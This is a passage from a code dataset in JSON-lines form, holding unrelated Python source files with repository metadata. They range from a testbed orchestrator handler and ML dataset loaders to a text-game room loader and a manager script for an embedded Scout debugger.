new_end_time = datetime.now(timezone.utc) + timedelta(hours=Constants.DEFAULT_LEASE_IN_HOURS)\n return new_end_time\n try:\n new_end_time = datetime.strptime(lease_end_time, Constants.LEASE_TIME_FORMAT)\n except Exception as e:\n raise OrchestratorException(f\"Lease End Time is not in format {Constants.LEASE_TIME_FORMAT}\",\n http_error_code=BAD_REQUEST)\n\n now = datetime.now(timezone.utc)\n if new_end_time <= now:\n raise OrchestratorException(f\"New term end time {new_end_time} is in the past! \",\n http_error_code=BAD_REQUEST)\n\n if allow_long_lived:\n default_long_lived_duration = Constants.LONG_LIVED_SLICE_TIME_WEEKS\n else:\n default_long_lived_duration = Constants.DEFAULT_MAX_DURATION\n if (new_end_time - now) > default_long_lived_duration:\n self.logger.info(f\"New term end time {new_end_time} exceeds system default \"\n f\"{default_long_lived_duration}, setting to system default: \")\n\n new_end_time = now + default_long_lived_duration\n\n return new_end_time\n\n @staticmethod\n def __translate_graph_format(*, graph_format: str) -> GraphFormat:\n if graph_format == GraphFormat.GRAPHML.name:\n return GraphFormat.GRAPHML\n elif graph_format == GraphFormat.JSON_NODELINK.name:\n return GraphFormat.JSON_NODELINK\n elif graph_format == GraphFormat.CYTOSCAPE.name:\n return GraphFormat.CYTOSCAPE\n else:\n return GraphFormat.GRAPHML\n\n def check_maintenance_mode(self, *, token: FabricToken, reservations: List[ReservationMng] = None):\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"check_maintenance_mode invoked for Controller: {controller}\")\n\n project, tags, project_name = token.get_first_project()\n\n if not controller.is_slice_provisioning_allowed(project=project, email=token.get_email()):\n raise OrchestratorException(Constants.MAINTENANCE_MODE_ERROR,\n http_error_code=Constants.INTERNAL_SERVER_ERROR_MAINT_MODE)\n\n if reservations is not None:\n for r in reservations:\n sliver = r.get_sliver()\n if not isinstance(sliver, NetworkServiceSliver):\n worker = None\n if sliver.get_labels() is not None and sliver.get_labels().instance_parent is not None:\n worker = sliver.get_labels().instance_parent\n status, message = controller.is_sliver_provisioning_allowed(project=project,\n site=sliver.get_site(),\n email=token.get_email(),\n worker=worker)\n if not status:\n raise OrchestratorException(message=message,\n http_error_code=Constants.INTERNAL_SERVER_ERROR_MAINT_MODE)\n\n def poa(self, *, token: str, sliver_id: str, poa: PoaAvro) -> Tuple[str, str]:\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"poa invoked for Controller: {controller}\")\n\n rid = ID(uid=sliver_id) if sliver_id is not None else None\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.modify)\n email = fabric_token.get_email()\n project, tags, project_name = fabric_token.get_first_project()\n\n auth = AuthAvro()\n auth.name = self.controller_state.get_management_actor().get_name()\n auth.guid = self.controller_state.get_management_actor().get_guid()\n auth.oidc_sub_claim = fabric_token.get_uuid()\n auth.email = fabric_token.get_email()\n poa.auth = auth\n poa.project_id = project\n poa.rid = sliver_id\n\n reservations = controller.get_reservations(rid=rid, email=email)\n if reservations is None or len(reservations) != 1:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n if controller.get_last_error().status.code == ErrorCodes.ErrorNoSuchReservation:\n raise OrchestratorException(f\"Reservation# {rid} not found\",\n http_error_code=NOT_FOUND)\n\n raise OrchestratorException(f\"Reservation# {rid} not found\",\n http_error_code=NOT_FOUND)\n\n res_state = ReservationStates(reservations[0].get_state())\n\n if res_state != ReservationStates.Active:\n raise OrchestratorException(f\"Cannot trigger POA; Reservation# {rid} is not {ReservationStates.Active}\")\n\n if not controller.poa(poa=poa):\n raise OrchestratorException(f\"Failed to trigger POA: \"\n f\"{controller.get_last_error().get_status().get_message()}\")\n self.logger.debug(f\"POA {poa.operation}/{sliver_id} added successfully\")\n return poa.poa_id, reservations[0].get_slice_id()\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing poa e: {e}\")\n raise e\n\n def get_poas(self, *, token: str, sliver_id: str = None, poa_id: str = None, states: List[str] = None,\n limit: int = 200, offset: int = 0):\n try:\n controller = self.controller_state.get_management_actor()\n self.logger.debug(f\"poa invoked for Controller: {controller}\")\n\n rid = ID(uid=sliver_id) if sliver_id is not None else None\n\n fabric_token = self.__authorize_request(id_token=token, action_id=ActionId.query)\n email = fabric_token.get_email()\n project, tags, project_name = fabric_token.get_first_project()\n\n poa_states = PoaStates.translate_list(states=states)\n\n auth = AuthAvro()\n auth.name = self.controller_state.get_management_actor().get_name()\n auth.guid = self.controller_state.get_management_actor().get_guid()\n auth.oidc_sub_claim = fabric_token.get_uuid()\n auth.email = fabric_token.get_email()\n\n poa_list = controller.get_poas(rid=rid, poa_id=poa_id, email=email, project_id=project,\n states=states, limit=limit, offset=offset)\n if poa_list is None:\n if controller.get_last_error() is not None:\n self.logger.error(controller.get_last_error())\n if controller.get_last_error().status.code == ErrorCodes.ErrorNoSuchPoa:\n raise OrchestratorException(f\"Reservation# {rid} not found\",\n http_error_code=NOT_FOUND)\n\n raise OrchestratorException(f\"{controller.get_last_error()}\")\n return ResponseBuilder.get_poa_summary(poa_list=poa_list)\n except Exception as e:\n self.logger.error(traceback.format_exc())\n self.logger.error(f\"Exception occurred processing poa e: {e}\")\n raise e","repo_name":"fabric-testbed/ControlFramework","sub_path":"fabric_cf/orchestrator/core/orchestrator_handler.py","file_name":"orchestrator_handler.py","file_ext":"py","file_size_in_byte":44498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"22006458799","text":"import os\nfrom PIL import Image\n\ndef resize_images(folder_path, new_width, new_height):\n for root, dirs, files in os.walk(folder_path):\n for file in files:\n if file.lower().endswith(('.png', '.jpg', '.jpeg', '.gif', '.bmp')):\n file_path = os.path.join(root, file)\n img = Image.open(file_path)\n img_resized = img.resize((new_width, new_height), Image.ANTIALIAS)\n img_resized.save(file_path)\n print(f\"Resized image: {file_path}\")\n\n##### RUN CODE #####\n\nfolder_path = '224x224_icon_synth_rob_adfes_dataset'\n#folder_path = '1_sod_dataset'\n#folder_path = 'batches/1_sod_batches/0_door_window_plan_80_20-06_05_23'\nwidth = 224\nheight = 224\nresize_images(folder_path, width, height)\n","repo_name":"synthline/print2model","sub_path":"1_1_sod_dataset_generator/img_resize.py","file_name":"img_resize.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41243649551","text":"#!/usr/bin/env python3\nimport os\nfrom typing import Optional\nimport json\nimport pickle\nimport yaml\nimport logging\nimport random\n\nimport torch\nfrom torch.utils.data import Dataset\nimport tf_conversions as tfconv\nfrom geometry_msgs.msg import Pose\nfrom PyKDL import *\n\nfrom main_utils import create_tensor_from_trajectory_point, create_shift_tesor\nfrom main_utils import LRUCache, create_full_trajectoy_point\n\n\nclass MyDatasetFull(Dataset):\n\n def __init__(self,\n trajectories_path: str,\n generations_path: str,\n trajectory_max_len: Optional[int] = None,\n cache_size: int = 1000\n ) -> None:\n self.trajectory_max_len = trajectory_max_len\n self.idx2data = {}\n for x in sorted(os.listdir(trajectories_path)):\n self.idx2data[len(self.idx2data)] = {\n \"trajectory\": os.path.join(trajectories_path, x),\n \"generation\": os.path.join(\n generations_path,\n f\"generation_logs_file_{x.split('_')[-1]}\"\n )\n }\n self.cacher = LRUCache(cache_size=cache_size)\n\n def __len__(self) -> int:\n return len(self.idx2data) * self.trajectory_max_len\n\n def __getitem__(self, idx: int):\n\n trajectory_idx = idx // self.trajectory_max_len\n pose_idx = idx % self.trajectory_max_len\n cache, exist = self.cacher.get(trajectory_idx)\n if exist:\n (trajectory, generation) = cache\n else:\n try:\n with open(self.idx2data[trajectory_idx][\"trajectory\"], \"rb\") as f:\n trajectory_raw = pickle.load(f)\n trajectory = trajectory_raw\n #trajectory = yaml.safe_load(str(trajectory_raw))\n with open(self.idx2data[trajectory_idx][\"generation\"], \"r\") as f:\n generation = json.load(f)\n except Exception as e:\n logging.warning(f\"Invalid trajectory with exception: {e}\")\n random_item = random.randint(0, self.__len__() - 1)\n return self.__getitem__(random_item)\n\n if generation[\"0\"][\"error_code\"] != 0:\n random_item = random.randint(0, self.__len__() - 1)\n logging.error(\"Invalid trajectory\")\n return self.__getitem__(random_item)\n\n self.cacher.set(trajectory_idx, (trajectory, generation))\n print(trajectory)\n exit(0)\n data = {\n \"trajectory_idx\": trajectory_idx,\n \"pose_idx\": pose_idx,\n \"shift\": create_shift_tesor(generation[\"0\"][\"shift\"]),\n \"features\": [0 for _ in range(35)],\n \"targets\": [0 for _ in range(35)],\n \"mask\": 0,\n }\n\n with open(\"inspect/base_motion\", \"w\") as f:\n for x in range(10):\n print(f\"Step: {x}\", file=f)\n print(trajectory.goal.base_motion.points[x], file=f)\n with open(\"inspect/leg_1\", \"w\") as f:\n for x in range(10):\n print(f\"Step: {x}\", file=f)\n print(trajectory.goal.ee_motion[0].points[x], file=f)\n\n if pose_idx >= len(trajectory.goal.base_motion.points) - 1:\n return data\n\n f_base_motion = trajectory.goal.base_motion.points[pose_idx]\n t_base_motion = trajectory.goal.base_motion.points[pose_idx + 1]\n\n\n T0 = tfconv.fromMsg(f_base_motion.pose)\n T1 = tfconv.fromMsg(t_base_motion.pose)\n\n T0.p[2] = 0\n T0inv = T0.Inverse()\n\n f_base_motion.pose = tfconv.toMsg(T0inv * T0)\n t_base_motion.pose = tfconv.toMsg(T0inv * T1) # To inverse use T0 *T1_new\n\n T0_twist = Twist(\n Vector(\n f_base_motion.twist.linear.x,\n f_base_motion.twist.linear.y,\n f_base_motion.twist.linear.z\n ),\n Vector(\n f_base_motion.twist.angular.x,\n f_base_motion.twist.angular.y,\n f_base_motion.twist.angular.z\n )\n )\n T1_twist = Twist(\n Vector(\n t_base_motion.twist.linear.x,\n t_base_motion.twist.linear.y,\n t_base_motion.twist.linear.z\n ),\n Vector(\n t_base_motion.twist.angular.x,\n t_base_motion.twist.angular.y,\n t_base_motion.twist.angular.z\n )\n )\n\n T0_twist = T0inv * T0_twist\n T1_twist = T0inv * T1_twist\n\n f_base_motion.twist.linear.x = T0_twist.vel[0]\n f_base_motion.twist.linear.y = T0_twist.vel[1]\n f_base_motion.twist.linear.z = T0_twist.vel[2]\n f_base_motion.twist.angular.x = T0_twist.rot[3]\n f_base_motion.twist.angular.y = T0_twist.rot[4]\n f_base_motion.twist.angular.z = T0_twist.rot[5]\n\n t_base_motion.twist.linear.x = T1_twist.vel[0]\n t_base_motion.twist.linear.y = T1_twist.vel[1]\n t_base_motion.twist.linear.z = T1_twist.vel[2]\n t_base_motion.twist.angular.x = T1_twist.rot[3]\n t_base_motion.twist.angular.y = T1_twist.rot[4]\n t_base_motion.twist.angular.z = T1_twist.rot[5]\n\n\n\n #print(T0_twist[0])\n #print(dir(T0_twist))\n #print(T0_twist.rot)\n\n return data\n\n data = {\n \"trajectory_idx\": idx,\n \"shift\": create_shift_tesor(generation[\"0\"][\"shift\"]),\n \"points\": [],\n \"masks\": []\n }\n\n print(trajectory)\n\n points = []\n for x in trajectory[\"goal\"][\"base_motion\"][\"points\"]:\n points.append(\n {\n \"step\": len(points),\n \"base_motion\": x\n }\n )\n # Remove constant parameters\n points[-1][\"base_motion\"].pop(\"accel\", None)\n points[-1][\"base_motion\"][\"pose\"][\"position\"].pop(\"z\", None)\n points[-1][\"base_motion\"][\"pose\"][\"orientation\"].pop(\"x\", None)\n points[-1][\"base_motion\"][\"pose\"][\"orientation\"].pop(\"y\", None)\n points[-1][\"base_motion\"][\"twist\"][\"linear\"].pop(\"z\", None)\n points[-1][\"base_motion\"][\"twist\"][\"angular\"].pop(\"x\", None)\n points[-1][\"base_motion\"][\"twist\"][\"angular\"].pop(\"y\", None)\n\n for leg_position in trajectory[\"goal\"][\"ee_motion\"]:\n for idx_tmp, x in enumerate(leg_position[\"points\"]):\n points[idx_tmp][leg_position[\"name\"]] = x\n\n # Remove constant parameters\n points[idx_tmp][leg_position[\"name\"]].pop(\"accel\", None)\n points[idx_tmp][leg_position[\"name\"]][\"pose\"].pop(\n \"orientation\", None\n )\n points[idx_tmp][leg_position[\"name\"]][\"twist\"][\"angular\"].pop(\n \"x\", None\n )\n points[idx_tmp][leg_position[\"name\"]][\"twist\"][\"angular\"].pop(\n \"y\", None\n )\n\n data[\"start_point\"] = create_tensor_from_trajectory_point(\n points[0]\n )[0]\n data[\"real_len\"] = len(points)\n\n for idx_tmp, x in enumerate(points):\n if (\n self.trajectory_max_len is not None and\n idx_tmp >= self.trajectory_max_len\n ):\n break\n #data[\"points\"].append(\n # create_full_trajectoy_point(data[\"shift\"], points[0], x)\n #)\n data[\"points\"].append(\n create_full_trajectoy_point(data[\"shift\"], None, x)\n )\n if (\n self.trajectory_max_len is not None and\n idx_tmp >= self.trajectory_max_len\n ):\n data[\"masks\"].append([0])\n else:\n data[\"masks\"].append([1])\n\n if self.trajectory_max_len is not None:\n while len(data[\"points\"]) < self.trajectory_max_len:\n data[\"points\"].append(\n [0 for x in data[\"points\"][-1]]\n )\n data[\"masks\"].append([0])\n\n data[\"shift\"] = torch.FloatTensor(data[\"shift\"])\n data[\"points\"] = torch.FloatTensor(data[\"points\"])\n data[\"masks\"] = torch.FloatTensor(data[\"masks\"])\n data[\"start_point\"] = torch.FloatTensor(data[\"start_point\"])\n\n return data","repo_name":"pansershrek/RosGateGenerator","sub_path":"main/dataset_way_coord_system.py","file_name":"dataset_way_coord_system.py","file_ext":"py","file_size_in_byte":8288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9788368514","text":"from django import forms\r\nfrom .models import Executor\r\n\r\n\r\nclass ExecutorForm(forms.ModelForm):\r\n class Meta:\r\n model = Executor\r\n fields = '__all__'\r\n def clean(self):\r\n data = self.cleaned_data['app_name']\r\n if data == \"hello\":\r\n raise forms.ValidationError(\"Not a proper titlecased string\")\r\n\r\n\r\n\r\n","repo_name":"Shohag-Rana/automation_project","sub_path":"myapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6955881968","text":"from xmpp.Stanzas import getAttr, getChild, jidAttr\nimport Event\nfrom debug_utils import *\nfrom wotdecorators import noexcept\nTYPE_NONE = 0\nTYPE_SESSION = 1\nTYPE_MUC = 2\n\nclass Entity:\n count = 0\n\n def __init__(self, type, id):\n Entity.count += 1\n self.type = type\n self.connection = None\n self.id = id\n self.eventDisconnected = Event.Event()\n return\n\n def __del__(self):\n Entity.count -= 1\n\n def onStanza(self, stanza):\n pass\n\n def onDisconnected(self):\n self.connection = None\n self.eventDisconnected()\n return\n\n def onConnected(self):\n pass\n\n def connect(self, connection):\n if connection:\n self.connection = connection\n self.onConnected()\n\n\nclass Session(Entity):\n\n def __init__(self, connection, clan_conference):\n Entity.__init__(self, connection, TYPE_SESSION)\n self.clan_conference = clan_conference\n self.eventMessage = Event.Event()\n self.eventFriendOnline = Event.Event()\n self.eventFriendOffline = Event.Event()\n\n\nclass MUC(Entity):\n\n def __init__(self, id, room):\n Entity.__init__(self, TYPE_MUC, id)\n self.room_jid = room\n self.eventMessage = Event.Event()\n self.eventUserOnline = Event.Event()\n self.eventUserOffline = Event.Event()\n","repo_name":"Omegaice/WOTDecompiled","sub_path":"res/scripts/common/xmpp/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"26496015136","text":"import json\n\nimport pandas as pd\n\nimport os\nimport sys\n\n\nclass Util:\n\n @staticmethod\n def save_pf_as_csv(\n data_df: pd.DataFrame,\n csv_file_name: str,\n relative_path: str\n ):\n script_dir = os.path.abspath(os.path.dirname(sys.argv[0]) or '.')\n proj_root_path = os.path.join(script_dir, '../')\n csv_path = os.path.join(proj_root_path, relative_path)\n data_df.to_csv(os.path.join(csv_path, csv_file_name))\n\n @staticmethod\n def save_dict_as_json(\n data_dict: dict,\n json_file_name: str,\n relative_path: str\n ):\n script_dir = os.path.abspath(os.path.dirname(sys.argv[0]) or '.')\n proj_root_path = os.path.join(script_dir, '../')\n json_path = os.path.join(proj_root_path, relative_path)\n target_path = os.path.join(json_path, json_file_name)\n with open(target_path, \"w\", encoding='utf-8') as json_file:\n json.dump(data_dict, json_file, indent='\\t')\n\n @staticmethod\n def get_json_dict_by_path(\n relative_path: str\n ):\n script_dir = os.path.abspath(os.path.dirname(sys.argv[0]) or '.')\n proj_root_path = os.path.join(script_dir, '../')\n json_path = os.path.join(proj_root_path, relative_path)\n\n try:\n with open(json_path) as json_file:\n json_data: dict = json.load(json_file)\n return json_data\n except Exception as e:\n print(e)\n return None\n","repo_name":"jaeleeps/cs4641-machine-learning","sub_path":"src/preparation/uitl.py","file_name":"uitl.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"42778827168","text":"from Room import Room, Connection\nfrom Item import Item\n\n\ndef aelurna_description():\n description = \"Aelurna is a world full of adventures and possiblities.\"\n return description\n\n\ndef init_inventory():\n inv = [Item(\"Dirty Pants\", \"Pants with holes, covered in mud and smell like a hobo\", \"Clothes\", 4),\n Item(\"Rusty Dagger\", \"This \\\"dagger\\\" is only about 3 inches long and very rusty\", \"One-Handed\", 2),\n Item(\"Faded sketching\", \"The flimsy piece of paper is dirty but the sketching of the beautiful \"\n \"young woman looks like it was sketched by a skilled artist.\", \"Misc\")]\n return inv\n\n\ndef load_rooms():\n \"\"\"\n A room has description, technical_notes, objects, npcs, connections\n A room is a dictionary object with its name as the index\n and the rest of the items stored as a list\n \"\"\"\n items = [Item(\"Rusty Key\", \"a heavy key covered in rust.\", \"Misc\", 1,\n \"You found a loose brick on the floor. Uncovering it reveals a key covered in damp mold.\"),\n Item(\"Smelly sock\", \"a foul smelling moldy sock.\", \"Misc\", 2,\n \"In the corner of the room there is a moldy sock. It doesn't look very useful.\")\n ]\n\n # name, connecting_room, location, descr, locked=False, toggle_condition=None\n connections = [Connection(\"Prison cell door\", \"Deep Dungeon Corridor\", \"On the wall\",\n \"heavy wooden door wrapped in iron\", True, \"Rusty Cell Key\"),\n Connection(\"Prison cell window\", None, \"Opposite the door\", \"small round, barred window. \"\n \"No light comes through but you can a hear a dripping sound. Unfortunately the window is very small.\", False),\n Connection(\"Wide Open Door\", \"Dungeon Corridor\", \"Ready for you\", \"come on through. \", False, \"Open\")\n ]\n rooms = {\n \"Prisoner's Cell\": Room(\n \"Prisoner's Cell\",\n \"The floor of this cramped room is a hard stone surface. There is barely any light. The air is dank, musty and has a smell of death. \"\n \"In the dim light you can make out chains on the wall.\",\n \"This is the room where the game starts.\",\n items, # objects in room\n None, # NPCs in room\n connections # Connections to other rooms\n ),\n \"Dungeon Corridor\": Room(\n \"Dungeon Corridor\",\n \"YOU MADE IT!! \",\n \"test test\",\n None, # objects in room\n None, # NPCs in room\n None # Connections to other rooms\n )\n }\n\n\n return rooms\n\n# Define the first room. Must be available above in load_rooms.\ndef get_first_room():\n return \"Prisoner's Cell\"\n","repo_name":"duncanbeggs/Aelurna","sub_path":"world_data.py","file_name":"world_data.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24994852503","text":"#!/usr/bin/python3\n\nfrom embedded_scout_api import *\nfrom scout_debugger.scout_network import *\nfrom elementals import Prompter, hexDump\n\nimport logging\nimport struct\nimport socket\nimport time\nimport sys\n\n##\n# Main debugging session (example)\n##\ndef startManage(sock_fd, logger):\n logger.info('Starting to manage the embedded Scout')\n\n logger.info('Allocating a remote memory buffer')\n data = sendInstr(sock_fd, instrAlloc(0x100), logger)\n\n memory_addr = struct.unpack(\" [full_scout.bin]')\n print('Exiting')\n exit(1)\n\n##\n# Main function (example)\n##\ndef main(args):\n # Check the arguments\n if len(args) not in [1 + 1, 1 + 2]:\n print(f'Wrong amount of arguments, got {len(args) - 1}, expected 1/2')\n printUsage(args)\n\n # parse the args\n server_ip = args[1]\n\n # open the log\n prompter = Prompter('Scout Manager', [('scout_log.txt', 'a', logging.DEBUG)])\n\n # Check if we need to load the full scout before connecting to it\n if len(args) == 1 + 2:\n scout_path = args[2]\n full_scout = open(scout_path, \"rb\").read()\n remoteLoadServer(server_ip, full_scout, prompter)\n prompter.info(\"Waiting for Scout to fully load\")\n time.sleep(2)\n\n # connect to the server\n prompter.info(\"Connecting to the fully loaded scout\")\n sock_fd = socket.create_connection((server_ip, SCOUT_PORT))\n\n # configure the scout\n setBitness32()\n\n # start the managing session\n startManage(sock_fd, prompter)\n\n prompter.info('Finished Successfully')\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"CheckPointSW/Scout","sub_path":"examples/embedded_scout/manager/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"76"} +{"seq_id":"16799979943","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport cv2\nimport numpy as np\nfrom scipy.spatial.distance import cdist\nfrom sklearn.cluster import KMeans\n\n\nclass Img(object):\n def __init__(self, width, height,\n cols, sort_idx, velocity=.2):\n if len(cols) != len(sort_idx):\n raise ValueError('len(cols) should be equal to len(sort_idx)')\n self.iteration = 0\n self.width = width\n self.height = height\n self.pixels = []\n self.cols = cols\n\n for i, c in enumerate(sort_idx):\n x, y = (c // self.height, c % self.height)\n dest_x, dest_y = (i // self.height,\n i % self.height)\n col = self.cols[c, :]\n pixel = Pixel(col, c, x, y, dest_x,\n dest_y, self.width,\n self.height,\n velocity=velocity)\n self.pixels.append(pixel)\n\n def is_done(self):\n return all([x.is_done() for x in self.pixels])\n\n def next_frame(self):\n for pixel in self.pixels:\n pixel.next_position()\n self.iteration += 1\n\n @staticmethod\n def closest_node(node, nodes):\n return nodes[cdist([node], nodes).argmin()]\n\n def create_frame(self):\n img = np.zeros((self.width, self.height, 3))\n expected_coord = set([(x, y)\n for x in range(self.width)\n for y in range(self.height)])\n coordinates = [(x.get_position(), x.ix) for x in self.pixels]\n for i, y in enumerate(coordinates):\n x, ix = y\n print(i)\n xi, yi = x\n col = self.cols[ix, :]\n img[xi, yi] = col\n img = cv2.cvtColor(np.uint8(img), cv2.COLOR_HSV2BGR)\n cv2.imwrite('res/img_{}.png'.format(str(self.iteration).zfill(4)),\n img)\n\n\nclass Pixel(object):\n def __init__(self, bgr, ix, cur_x, cur_y,\n dest_x, dest_y, width, height,\n velocity=1):\n self.dest_x = dest_x\n self.dest_y = dest_y\n self.ix = ix\n self.bgr = bgr\n self.height = height\n self.width = width\n self.velocity = velocity\n self.position = np.array([cur_x, cur_y])\n self.destination = np.array([dest_x, dest_y])\n\n def set_position(self, x, y):\n self.position = np.array([x, y])\n\n def get_position(self):\n return (self.position[0],\n self.position[1])\n\n def get_destination(self):\n return (self.destination[0],\n self.destination[1])\n\n def get_col(self):\n return self.bgr\n\n def next_position(self):\n if all(self.position == self.destination):\n return\n vec_pos_to_dest = self.destination - self.position\n distance = np.linalg.norm(vec_pos_to_dest)\n\n if distance < 12:\n self.position == self.destination\n return\n vec_pos_to_dest = vec_pos_to_dest / distance\n\n # position = self.position + (vec_pos_to_dest *\n # max(1.6, self.velocity *\n # distance))\n position = self.position + (vec_pos_to_dest * distance)\n position = np.uint32(np.round(position))\n if position[0] > self.width-1:\n position[0] = self.width-1\n if position[1] > self.height-1:\n position[1] = self.height-1\n if position[0] < 0:\n position[0] = 0\n if position[1] < 0:\n position[1] = 0\n self.position = position\n return\n\n def is_done(self):\n return all(self.position == self.destination)\n\n\nhash_colorspace = {'hsv': [cv2.COLOR_BGR2HSV, cv2.COLOR_HSV2BGR],\n 'luv': [cv2.COLOR_BGR2LUV, cv2.COLOR_LUV2BGR],\n 'hls': [cv2.COLOR_BGR2HLS, cv2.COLOR_HLS2BGR],\n 'xyz': [cv2.COLOR_BGR2XYZ, cv2.COLOR_XYZ2BGR],\n 'lab': [cv2.COLOR_BGR2LAB, cv2.COLOR_LAB2BGR],\n }\n\n\ndef sort_colors(img_path):\n kmeans = KMeans(n_clusters=50)\n bgr_img = cv2.imread(img_path)\n bgr_img = cv2.cvtColor(bgr_img, cv2.COLOR_BGR2HSV)\n width, height, nc = bgr_img.shape\n img = bgr_img.reshape(width*height, nc)\n\n clusters_ = kmeans.fit_predict(img)\n new_img = np.zeros((width*height, nc))\n for i, x in enumerate(clusters_):\n new_img[i, :] = kmeans.cluster_centers_[x, :]\n img = new_img\n img_sort = np.array(sorted(img, key=lambda k: (k[0], k[2], k[1])))\n idx_sort = sorted(range(len(img)), key=lambda k: (img[k, 0],\n img[k, 2],\n img[k, 1]))\n # idx_sort = list(range(len(img)))\n # idx_sort = list(range(len(img)))\n img_res = img_sort.reshape(width,\n height,\n nc)\n new_img = np.zeros((width, height, nc))\n\n for i, c in zip(idx_sort, img):\n new_img[i//height, i%height, :] = c\n\n for c, i in enumerate(idx_sort):\n new_img[c // height, c % height, :] = img[i, :]\n\n img_final = new_img\n img_final = cv2.cvtColor(np.uint8(img_final), cv2.COLOR_HSV2BGR)\n img_res = cv2.cvtColor(np.uint8(img_res), cv2.COLOR_HSV2BGR)\n cv2.imwrite('test_idx_sort.png', img_final)\n cv2.imwrite('test_img_sort.png', img_res)\n image = Img(width, height, img, idx_sort, velocity=.1)\n for i in range(1000):\n image.create_frame()\n image.next_frame()\n","repo_name":"adrz/sort-colors-image","sub_path":"src/poster_colors.py","file_name":"poster_colors.py","file_ext":"py","file_size_in_byte":5556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12708772527","text":"'''\n재귀 호출, 재귀 함수\ndef f(i, k):\n if i == k: # 목표에 도달하면\n print(B)\n return\n else:\n B[i] = A[i]\n f(i+1, k)\n\n\nA = [i for i in range(1000)]\nB = [0]*1000\nf(0,1000)\n'''\n\n'''\n7 8\n1 2 1 3 2 4 2 5 4 6 5 6 6 7 3 7\n'''\nV, E = map(int, input().split())\narr = list(map(int, input().split()))\nadjM = [[0]*(V+1) for _ in range(V+1)]\nadjL = [[] for _ in range(V+1)]\n\nfor i in range(E):\n v1, v2 = arr[i*2], arr[i*2+1] # 쌍에서 2개씩 가져올게 하면 이런 방법을 이용할 수도 있다.\n adjM[v1][v2] = 1\n adjM[v2][v1] = 1\n \n adjL[v1].append(v2)\n adjL[v2].append(v1)\n\nprint()","repo_name":"KimBeomGi/STUDYduringSSAFY","sub_path":"python/수업/기록_230214.py","file_name":"기록_230214.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2078293337","text":"# Python program to print all positive numbers in a range\r\n\r\ndef findPos(start, end):\r\n li = []\r\n for i in range(start, end+1):\r\n if i >= 0:\r\n li.append(i)\r\n\r\n return li\r\n\r\n\r\nprint(findPos(-4, 5))\r\n","repo_name":"Just2Deep/python_practice","sub_path":"Practice/Practice25.py","file_name":"Practice25.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33801554733","text":"import sys\nimport json\nimport io\nimport gzip\nimport uuid\nimport math\n\nfrom datetime import timedelta\n\nimport scipy.integrate as integrate\nimport scipy.special as special\nimport numpy as np\n\nfrom pyspark_cassandra import CassandraSparkContext\nfrom pyspark_cassandra import RowFormat\nfrom pyspark import SparkConf\n\n#Return the byte size from the string defining the memory limit of a container (eg. 2g, 2gb, ...) \ndef byteSizeFromString(arg):\n arg = arg.replace(\" \", \"\")\n mUnit = \"\"\n if not arg[-1].isdigit() and not arg[-2].isdigit():\n mUnit = arg[-2:]\n mUnit = mUnit.lower()\n elif not arg[-1].isdigit() and arg[-2].isdigit():\n mUnit = arg[-1]\n mUnit = mUnit.lower()\n elif arg.isdigit():\n return long(arg)\n else:\n return None\n if \"kb\" in mUnit or \"k\" in mUnit:\n return long(arg[:-2]) *1024\n elif \"mb\" in mUnit or \"m\" in mUnit:\n return long(arg[:-2]) *1024 *1024\n elif \"gb\" in mUnit or \"g\" in mUnit:\n return long(arg[:-2]) *1024 *1024 *1024\n elif \"tb\" in mUnit or \"t\" in mUnit:\n return long(arg[:-2]) *1024 *1024 *1024 *1024\n else:\n return long(arg[:-2])\n \n#Compute the absolute efficiency of the RAM\ndef absoluteRamEfficency(sc, cassandraKeyspace, trialID, experimentID, containerID, hostID, dataIntegral, dataPoints):\n # Taking from the container properties\n containerProperties = sc.cassandraTable(cassandraKeyspace, \"container_properties\") \\\n .select(\"mem_limit\") \\\n .where(\"trial_id=? AND experiment_id=? AND container_id=? AND host_id=?\", trialID, experimentID, containerID, hostID) \\\n .first()\n maxMemory = containerProperties[\"mem_limit\"]\n # If Docker returns memory as either 0 or -1 it means unlimited memory given to the container, so we need the host memory\n if maxMemory is not None:\n byteSizeFromString(maxMemory)\n if maxMemory is None or maxMemory < 1:\n hostProperties = sc.cassandraTable(cassandraKeyspace, \"host_properties\") \\\n .select(\"mem_total\") \\\n .where(\"host_id=?\", hostID) \\\n .first()\n maxMemory = hostProperties[\"mem_total\"]\n if maxMemory is None:\n return None\n absoluteEfficency = dataIntegral/float(long(maxMemory)*dataPoints)\n return absoluteEfficency\n\n#Create the queries containg the results of the computations to pass to Cassandra\ndef createQuery(dataRDD, sc, cassandraKeyspace, experimentID, trialID, containerID, containerName, hostID):\n from commons import computeMode, computeMetrics\n \n mode = computeMode(dataRDD)\n \n data = dataRDD.map(lambda x: 